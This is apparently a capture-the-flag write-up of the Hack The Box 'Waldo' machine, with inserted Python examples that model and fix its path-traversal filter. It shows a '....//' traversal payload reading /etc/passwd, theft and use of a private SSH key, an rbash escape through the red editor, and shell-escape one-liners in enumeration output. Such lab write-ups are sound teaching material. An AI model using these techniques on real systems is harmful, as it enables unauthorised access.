Initial Enumeration
So we have a Linux box with 2 open ports and a filtered port. Let's check out the ports in turn:
22/OpenSSH 7.5p2
Not much use at this stage. No known exploits for it and no usernames to even brute force.
80/HTTP nginx 1.12.2
Browsing to the site shows:
It's a Where's Waldo (that's Where's Wally to us Brits) themed site with a web app called List Manager. If you click Add List, a list is added and given the next number in the sequence. And you can delete it with the Delete button.
Viewing the page source we can see it uses a JavaScript file called list.js
and we can look at the code for that. Here is some of it:
I'm no JavaScript expert but I can see some PHP files being called, fileWrite.php and fileDelete.php etc, and that a POST request is being used.
Time to fire up Burp Suite to intercept and analyse these requests. Using FoxyProxy to make switching traffic to Burp easy, turn on Intercept and try the Add List button:
As suspected, that button sends a POST request to fileWrite.php, which is in the web root /. There are some parameters in the body: we can specify the list number with the listnum parameter and even add content to it using the data parameter.
If we click on one of the lists on the screen we see another PHP file called fileRead.php
To speed up this discovery process, I just try clicking every possible option, knowing that Burp will store the results in the Site Map:
Also worth noting here is that the dirRead.php refers to a directory: /.list
What do we know about this web app so far?
In the root directory 10.10.10.84/ we have:
- list.html
- list.js
- dirRead.php
- fileDelete.php
- fileRead.php
- fileWrite.php
And there is a directory /.list/ which we don't have permission to access directly. We can alter the parameters being sent in the POST requests.
With Burp the easiest way of fiddling around with these things is to use the Repeater module, which allows you to repeatedly send requests without having to re-write them each time, lets you edit any part of them, go back to previous edits etc. In the HTTP History section of the proxy, we find each relevant request, right-click and select Send to Repeater.
Using Repeater I use fileWrite.php to create "list 99", just to see if I can, and add some arbitrary data to it. Then I check whether I can find it using dirRead.php, which I can. I can also read the file itself using fileRead.php. Unfortunately writing PHP code into the list file doesn't get it executed, so no easy shell there. This is likely because I'm using a PHP function to read the file rather than GETting it, which would trigger the PHP interpreter. The list files, including my "list99", are being stored in 10.10.10.87/.list which is not accessible by the browser or other GET request mechanisms. However all is not lost, because whilst I cannot execute PHP, I can read PHP source code, so let's look at these files, starting with fileRead.php itself:
The PHP source code comes back mangled (the response is JSON, so the file contents arrive escaped). I don't know if there is an elegant way of sorting this out, but I used Word's find and replace function to swap these escape sequences:
- \n = newline
- \t = tab
- \" = '
- \/ = /
and got this far:
<?php
if($_SERVER['REQUEST_METHOD'] === 'POST') {
    $fileContent['file'] = false;
    header('Content-Type: application/json');
    if(isset($_POST['file'])){
        header('Content-Type: application/json');
        // single-pass removal of "../" and "..\" (the '..\\' literal is the two characters ..\)
        $_POST['file'] = str_replace( array('../', '..\\'), '', $_POST['file']);
        if(strpos($_POST['file'], 'user.txt') === false){
            $file = fopen('/var/www/html/' . $_POST['file'], 'r');
            $fileContent['file'] = fread($file,filesize($_POST['file']));
            fclose();
        }
    }
    echo json_encode($fileContent);
}
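The find/replace above is hand-decoding JSON string escapes (fileRead.php wraps the file in json_encode()), and a real JSON decoder does it exactly. This added Python example is not from the write-up: it recovers a constructed sample response with json.loads and shows where the four manual rules go wrong (a literal backslash-n inside a PHP string literal). SAMPLE_RESPONSE and EXPECTED_SOURCE are constructed stand-ins, not real output from the box.

```python
import json
from typing import Optional

# Constructed stand-in for a fileRead.php response body: json_encode() wraps the
# file in {"file": ...} and escapes newlines, tabs, double quotes and slashes.
# The PHP source it carries contains the two-character sequence backslash-n
# inside a string literal, which json_encode() emits as \\n.
SAMPLE_RESPONSE = r'{"file":"<?php\n\t$sep = \"\\n\";\n\techo \"\/var\/www\/html\/\";\n"}'

# The exact source text that produced SAMPLE_RESPONSE (also constructed).
EXPECTED_SOURCE = '<?php\n\t$sep = "\\n";\n\techo "/var/www/html/";\n'


def recover_source(body: str) -> Optional[str]:
    """Decode the JSON body and return the file contents, or None when the
    server answered {"file": false} (e.g. the request hit the user.txt check)."""
    data = json.loads(body)
    content = data.get("file")
    return content if isinstance(content, str) else None


def escaped_value(body: str) -> str:
    """Strip the {"file":" ... "} wrapper so the raw escaped text can be compared."""
    prefix, suffix = '{"file":"', '"}'
    assert body.startswith(prefix) and body.endswith(suffix)
    return body[len(prefix):-len(suffix)]


def naive_unescape(escaped: str) -> str:
    """The four find/replace rules from the write-up, applied in that order to the
    raw escaped text. Kept only to show the failure: the rule for \\n also fires
    on the second half of \\\\n, turning a literal backslash-n in the PHP source
    into a backslash followed by a real newline."""
    return (escaped.replace("\\n", "\n")
                   .replace("\\t", "\t")
                   .replace('\\"', "'")
                   .replace("\\/", "/"))


if __name__ == "__main__":
    exact = recover_source(SAMPLE_RESPONSE)
    rough = naive_unescape(escaped_value(SAMPLE_RESPONSE))
    print("json.loads matches the original source:", exact == EXPECTED_SOURCE)
    print("find/replace matches the original source:", rough == EXPECTED_SOURCE)
```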
My PHP isn't great so this could be wrong, but it's clear there is some filtering going on to stop you from just browsing for files easily. Straight away we can see that it's not going to let you read the user.txt file! And then it looks like it's deleting "../" and "..\", which is going to make the usual directory traversal techniques harder. Normally you just use ../ to go up in the directory tree, but this will merely delete that. After messing around with it for a while I hit upon the idea of using ....// so that when the ../ is deleted we're left with ../, and this works fine: I'm able to read the /etc/passwd file at ....//....//....//etc/passwd
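The root cause is that str_replace() removes "../" in a single pass, so any input that still contains "../" after one removal gets through. This added Python example (not the box's code) models that filter, confirms the page's ....// vector resolves outside /var/www/html, and shows the fix a defender would ship instead: join, normalise, and require the result to stay under the web root, with no attempt to strip traversal sequences at all. The names waldo_filter, resolves_outside_root and hardened_path are mine; normalisation uses posixpath so it runs without the files existing.

```python
import posixpath
from typing import Optional

# Base directory that fileRead.php prepends to the user-supplied name (from the page).
WEB_ROOT = "/var/www/html"


def waldo_filter(user_path: str) -> Optional[str]:
    """Model of the original check: one non-recursive str_replace() of '../' and
    '..\\', then a substring test for 'user.txt'. Returns the path the script
    would open, or None when the request is refused."""
    cleaned = user_path.replace("../", "").replace("..\\", "")
    if "user.txt" in cleaned:
        return None
    return WEB_ROOT + "/" + cleaned


def resolves_outside_root(full_path: str) -> bool:
    """True when the path, once '..' segments are collapsed, leaves WEB_ROOT.
    posixpath.normpath is pure string work, so no files need to exist."""
    normalised = posixpath.normpath(full_path)
    return not (normalised == WEB_ROOT or normalised.startswith(WEB_ROOT + "/"))


def hardened_path(user_path: str) -> Optional[str]:
    """Replacement check: never try to strip traversal sequences. Join, normalise,
    and accept only if the result is still inside WEB_ROOT. An absolute user_path
    is rejected as well, because posixpath.join() lets it replace the root."""
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, user_path))
    if candidate == WEB_ROOT or not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # A legitimate file, a plain traversal (which the blacklist does catch) and
    # the page's nested vector (which it does not).
    for name in ("list.js", "../../../etc/passwd", "....//....//....//etc/passwd"):
        opened = waldo_filter(name)
        escaped = opened is not None and resolves_outside_root(opened)
        print(f"{name!r:34} original -> {opened}  (outside root: {escaped})")
        print(f"{'':34} hardened -> {hardened_path(name)}")
```

In PHP the equivalent of hardened_path is realpath() on the joined path followed by the same prefix test; realpath() also follows symlinks, which posixpath.normpath does not, so use the filesystem-aware call in production.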
Note there is a user with a /bin/sh login called "nobody". Let's check out his home folder. There are several files in there:
[".","..",".ash_history",".ssh",".viminfo","user.txt"]
We know we cannot read user.txt, but in the .ssh directory there are some very interesting files, not least the .monitor file containing a private RSA key:
SSH allows authenticating via public/private key pairs instead of passwords. The private key is the one required by the ssh client, so we should be able to use this to ssh in. However it looks a bit mangled, so hopefully our find/replace system will work on this too. After running it through that I get a cleanly formatted key block.
That looks very much like a legit RSA key too. So now to paste that into a key file, set the permissions of the file to secure it (ssh requires this) and see if it works:
We’re in! Let’s grab the user.txt file to paste into the HTB system and move on.
In the .ssh folder there is an authorized_keys file containing a reference to a user called monitor:
This is confusing. I would assume that the nobody key is authorised (or how else did it work) and yet this file only has one key and it mentions "monitor@waldowaldo". Weird. And why "@waldowaldo" when the machine is called "waldo"?
I’m going to check that this is the key we just used, just to be sure. The easiest way is to use the ssh keygen to generate a public key from the private key we have and see if it matches this one in the authorized_keys file:
root@kali:~/HTB/Waldo# ssh-keygen -y -e -f key
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@kali from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQCzuzK0MT740dpYH17403dXm3UM/VNgdz7ijwPfra
Xk3B/oKmWZHgkfqfg1xx2bVlT6oHvuWLxk6/KYG0gRjgWbTtfg+q3jN40F+opaQ5zJXVMt
bp/zuzQVkGFgCLMas014suEHUhkiOkNUlRtJcbqzZzECV7XhyP6mcSJFOzIyKrWckJJ0YJ
z+A2lb8AA0g3i9b0qyUuqIAQMl9yFjnmwInnXrZj34jXHOoXx71vXbBVeKu82jw8sacUlX
DpIeGY8my572+MAh4f6f7leRtzz/qlx6jCqz26NGQ3Mf1PWUmrgXHVW+L3cNqrdtnd2Egh
ZpZp+arOD6NJOFJY4jBHvf
---- END SSH2 PUBLIC KEY ----
root@kali:~/HTB/Waldo#
And of course it does. So WTF is monitor@waldowaldo about then?
Notice how when we ssh'd in, we got a "Welcome to Alpine Wiki" message? Let's run a privesc tool and see what else is there:
waldo:/tmp$ python linuxprivchecker.py ================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29) [+] Hostname waldo [+] Operating System Welcome to Alpine Linux 3.6 Kernel \r on an \m (\l) [*] GETTING NETWORKING INFO... [+] Interfaces docker0 Link encap:Ethernet HWaddr 02:42:07:0A:99:80 inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) ens33 Link encap:Ethernet HWaddr 00:50:56:A4:A8:C1 inet addr:10.10.10.87 Bcast:10.10.10.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1143587 errors:0 dropped:102 overruns:0 frame:0 TX packets:965321 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:161520906 (154.0 MiB) TX bytes:201250810 (191.9 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:4416890 errors:0 dropped:0 overruns:0 frame:0 TX packets:4416890 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:560407680 (534.4 MiB) TX bytes:560407680 (534.4 MiB) [+] Netstat Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN - tcp 0 1152 10.10.10.87:8888 10.10.14.19:51932 ESTABLISHED - tcp 0 0 :::80 :::* LISTEN - tcp 0 0 :::22 
:::* LISTEN - tcp 0 0 :::8888 :::* LISTEN - udp 0 0 10.10.10.87:35491 10.10.10.2:53 ESTABLISHED - [+] Route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33 10.10.10.0 * 255.255.255.0 U 0 0 0 ens33 169.254.0.0 * 255.255.0.0 U 1000 0 0 ens33 172.17.0.0 * 255.255.0.0 U 0 0 0 docker0 [*] GETTING FILESYSTEM INFO... [+] Mount results [+] fstab entries /dev/cdrom /media/cdrom iso9660 noauto,ro 0 0 /dev/usbdisk /media/usb vfat noauto,ro 0 0 [+] Scheduled cron jobs total 12 drwxr-xr-x 2 root root 4096 Jan 9 2018 . drwxr-xr-x 1 root root 4096 May 3 20:50 .. -rw------- 1 root root 283 Apr 24 2017 root [+] Writable cron dirs [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity [+] Super Users Found: root [+] Environment USER=nobody SSH_CLIENT=10.10.14.19 51932 8888 MAIL=/var/mail/nobody SHLVL=2 HOME=/home/nobody OLDPWD=/ SSH_TTY=/dev/pts/1 PAGER=less PS1=\h:\w\$ LOGNAME=nobody TERM=xterm-256color PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin SHELL=/bin/sh PWD=/tmp SSH_CONNECTION=10.10.14.19 51932 10.10.10.87 8888 CHARSET=UTF-8 [+] Root and current user history (depends on privs) lrwxrwxrwx 1 root root 9 Jul 24 11:57 /home/nobody/.ash_history -> /dev/null [+] Sudoers (privileged) [+] All users root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/bin/sh man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin 
sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/home/nobody:/bin/sh nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin [+] Current User nobody [+] Current User ID uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/shm drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/mqueue drwxrwxrwt 2 root root 40 Sep 10 02:02 /sys/firmware drwxrwxrwt 1 root root 4096 Sep 12 10:06 /tmp [+] World Writeable Directories for Users other than Root [+] World Writable Files --w--w--w- 1 root root 0 Sep 10 02:02 /sys/fs/cgroup/memory/cgroup.event_control [+] Checking if root's home folder is accessible /root: total 0 [+] SUID/SGID Files and Directories -rwsr-xr-x 1 root root 41984 May 17 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 50016 May 17 2017 /usr/bin/chage -rwsr-xr-x 1 root root 18536 May 17 2017 /usr/bin/expiry -rwsr-xr-x 1 root root 41464 May 17 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 32256 May 17 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 31616 May 17 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 54744 May 17 2017 /usr/bin/gpasswd -rwxr-sr-x 1 root shadow 26328 May 16 2017 /sbin/unix_chkpwd [+] Logs containing keyword 'password' [+] Config files containing keyword 'password' [+] Shadow File (Privileged) [*] ENUMERATING PROCESSES AND APPLICATIONS... 
[+] Installed Packages [+] Current processes PID USER 1 root 7 root daemon off; 8 root 9 root 10 nginx 1142 root 1144 nobody 1145 nobody 1181 nobody 1263 nobody awk '{print $1,$2,$9,$10,$11}' 1264 nobody 1265 nobody [+] Apache Version and Modules [+] Apache Config File [+] Sudo Version (Check out https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo) [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER... 1 root 8 root 7 root daemon off; 1142 root 9 root [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... [+] Installed Tools /usr/bin/awk /usr/bin/python /usr/bin/vi /usr/bin/vim /usr/bin/find /usr/bin/nc /usr/bin/wget /usr/bin/tftp [+] Related Shell Escape Sequences... vi--> :!bash vi--> :set shell=/bin/bash:shell vi--> :!bash vi--> :set shell=/bin/bash:shell awk--> awk 'BEGIN {system("/bin/bash")}' find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! 
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system - Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || https://www.exploit-db.com/exploits/5720 || Language=python - Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit || https://www.exploit-db.com/exploits/3384 || Language=c The following exploits are applicable to this kernel version and should be investigated as well - Kernel ia32syscall Emulation Privilege Escalation || https://www.exploit-db.com/exploits/15023 || Language=c - Sendpage Local Privilege Escalation || https://www.exploit-db.com/exploits/19933 || Language=ruby** - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || https://www.exploit-db.com/exploits/15944 || Language=c - CAP_SYS_ADMIN to root Exploit || https://www.exploit-db.com/exploits/15916 || Language=c - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c - open-time Capability file_ns_capable() Privilege Escalation || https://www.exploit-db.com/exploits/25450 || Language=c - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/25307 || Language=c Finished ================================================================================================= waldo:/tmp$
That is an oddly minimal output compared to the usual ones.
There are a few hidden files and a directory in nobody's home folder:
The user.txt token is there and readable so Step 1 accomplished.
In the .ssh folder:
And let's check out the .viminfo file. There's quite a lot in it and most of it centres around changes made to the following files: ~/rootkey and dev/shm/id_rsa, neither of which appear to exist anymore.
The .monitor file is a private RSA key file. It is not the same one we used to ssh in as the user nobody:
At this point I got caught up in trying to work out why root's shell was /bin/ash and not /bin/bash, which led me to finding out we were on some sort of BusyBox machine etc, when I should have seen what was in front of me: if you've been given something as valuable as a private SSH key and a user name ("monitor") then you sure as hell ought to at least try using them. The problem is I'd made the mistake of looking at some hints on the HTB forum which totally misled me, and I ended up wasting hours chasing irrelevant nonsense. Sometimes a little (cryptic) knowledge is a dangerous thing.
So using the .monitor key, just as before we find Waldo:
The monitor user is even more restricted than nobody and appears to be in a chroot "jail". Files from his home directory:
As you can see, he has very limited commands available but does have PATH set up for the app-dev folder files:
Escaping rbash Jail
Just 4 commands are available: ls, most, red and rnano. These are symbolic links to the files in the root system outside of our chroot jail. The commands:
- ls is just the normal ls
- most is another output pager like more or less
- red is a restricted form of ed, which is a line-based text editor, apparently
- rnano is a restricted form of nano, the popular Linux editor.
Interestingly though, the symlinks for red and rnano actually point to their unrestricted counterparts, which might be relevant.
Maybe we can use this fact to browse or otherwise edit items outside of the chroot jail? I tried opening a file in nano using Ctrl-R but got an error saying it was not allowed in restricted mode, so maybe my theory isn't sound? I don't know the first thing about red/ed so will have to google that. The first page I found was: https://www.tutorialspoint.com/unix_commands/ed.htm
First thing I tried was to give my ed session a prompt “red:” – just to amuse myself and so it was clear that ed command worked:
According to that guide you can specify a file to edit, but if you prefix it with a bang (!) it is interpreted as a shell command, and so the obvious move is to open a shell outside of the chroot jail and thus escape it. This works perfectly:
Now for a bit of enumeration:
monitor@waldo:/tmp$ LinEnum.sh ########################################################## Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # [-] Debug Info [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!) Scan started at: Thu Sep 13 09:38:53 EDT 2018 ### SYSTEM ############################################## [-] Kernel information: Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29) [-] Specific release information: PRETTY_NAME="Debian GNU/Linux 9 (stretch)" NAME="Debian GNU/Linux" VERSION_ID="9" VERSION="9 (stretch)" ID=debian HOME_URL="https://www.debian.org/" SUPPORT_URL="https://www.debian.org/support" BUG_REPORT_URL="https://bugs.debian.org/" [-] Hostname: waldo ### USER/GROUP ########################################## [-] Current user/group info: uid=1001(monitor) gid=1001(monitor) groups=1001(monitor) [-] Who else is logged on: 09:38:53 up 5:34, 1 user, load average: 0.13, 0.03, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT monitor pts/0 127.0.0.1 06:27 4.00s 6.28s 0.00s /bin/bash /tmp/LinEnum.sh [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) 
uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network) uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(avahi-autoipd) gid=109(avahi-autoipd) groups=109(avahi-autoipd) uid=106(messagebus) gid=110(messagebus) groups=110(messagebus) uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(steve) gid=1000(steve) groups=1000(steve),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth) uid=1001(monitor) gid=1001(monitor) groups=1001(monitor) uid=1002(app-dev) gid=1002(app-dev) groups=1002(app-dev) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network 
Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false avahi-autoipd:x:105:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin steve:x:1000:1000:steve,,,:/home/steve:/bin/bash monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash [-] Super user account(s): root [-] Are permissions on /home directories lax: total 20K drwxr-xr-x 5 root root 4.0K May 3 16:50 . drwxr-xr-x 22 root root 4.0K May 1 23:04 .. drwxr-xr-x 2 app-dev app-dev 4.0K May 3 16:50 app-dev drwxr-x--- 5 root monitor 4.0K Jul 24 07:58 monitor drwxr-xr-x 2 steve steve 4.0K May 1 23:30 steve ### ENVIRONMENTAL ####################################### [-] Environment information: SSH_CONNECTION=127.0.0.1 35820 127.0.1.1 22 LANG=en_US.UTF-8 OLDPWD=/home/monitor XDG_SESSION_ID=11 USER=monitor PWD=/tmp HOME=/home/monitor SSH_CLIENT=127.0.0.1 35820 22 SSH_TTY=/dev/pts/0 MAIL=/var/mail/monitor TERM=xterm-256color SHELL=/bin/rbash SHLVL=3 LOGNAME=monitor XDG_RUNTIME_DIR=/run/user/1001 PATH=PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/ _=/usr/bin/env [-] Path information: PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/ [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash [-] Current umask value: 0111 u=rw,g=rw,o=rw [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### 
JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab /etc/cron.d: total 16 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rw-r--r-- 1 root root 285 May 29 2017 anacron -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.daily: total 40 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 311 May 29 2017 0anacron -rwxr-xr-x 1 root root 1474 Sep 13 2017 apt-compat -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils -rwxr-xr-x 1 root root 1597 Feb 22 2017 dpkg -rwxr-xr-x 1 root root 89 May 5 2015 logrotate -rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db -rwxr-xr-x 1 root root 249 May 17 2017 passwd -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 May 1 23:03 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.monthly: total 16 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 313 May 29 2017 0anacron -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 312 May 29 2017 0anacron -rwxr-xr-x 1 root root 723 Dec 13 2016 man-db -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. 
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Anacron jobs and associated file permissions: -rw-r--r-- 1 root root 401 May 29 2017 /etc/anacrontab # /etc/anacrontab: configuration file for anacron # See anacron(8) and anacrontab(5) for details. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin HOME=/root LOGNAME=root # These replace cron's entries 1 5 cron.daily run-parts --report /etc/cron.daily 7 10 cron.weekly run-parts --report /etc/cron.weekly @monthly 15 cron.monthly run-parts --report /etc/cron.monthly [-] When were jobs last executed (/var/spool/anacron contents): total 20 drwxr-xr-x 2 root root 4096 May 3 16:44 . drwxr-xr-x 5 root root 4096 May 1 23:25 .. 
